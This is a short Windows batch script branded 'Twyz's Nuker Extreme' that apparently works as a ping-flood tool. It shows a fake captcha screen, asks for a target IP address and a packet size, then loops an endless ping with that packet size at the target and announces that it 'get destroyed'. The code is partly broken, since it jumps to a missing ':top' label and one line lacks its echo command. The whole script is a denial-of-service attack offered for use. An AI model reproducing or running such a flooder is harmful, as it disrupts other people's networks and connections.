@echo off
color 6


title CHECK IN PROCESS... bot : %random% 
echo Push every letter for finish the checkmod Captcha !
pause

cls
cls
goto:home

:home
title Twyz's Nuker Extreme
ECHO d888888b d8888b.   d8888b. d888888b d8b   db  d888b  d88888b d8888b. 
ECHO  `88'   88  `8D   88  `8D   `88'   888o  88 88' Y8b 88'     88  `8D 
ECHO   88    88oodD'   88oodD'    88    88V8o 88 88      88ooooo 88oobY' 
ECHO   88    88~~~     88~~~      88    88 V8o88 88  ooo 88~~~~~ 88`8b   
ECHO  .88.   88        88        .88.   88  V888 88. ~8~ 88.     88 `88. 
ECHO Y888888P 88        88      Y888888P VP   V8P  Y888P  Y88888P 88   YD
echo.
echo.
echo [+] Let's set ur IP please !
set /p IP=Twyz@IP/:
cls
echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
cls
goto:pack

:pack
echo [+] Please set ur Packet !
set /p Packet=Twyz@Packet/:
cls 
echo %random%%random%%random%%random%%random%%random%%random%%random%
cls
goto:ping

:ping 
ping %IP% /w 1 /t /l %packet%
echo =+=
IF ERRORLEVEL 1 (color 3 & echo || Ping %IP%... ||)
IF NOT ERRORLEVEL 1 (color 4 & [+] %IP% get destroyed...)
color 2
color a
goto:top

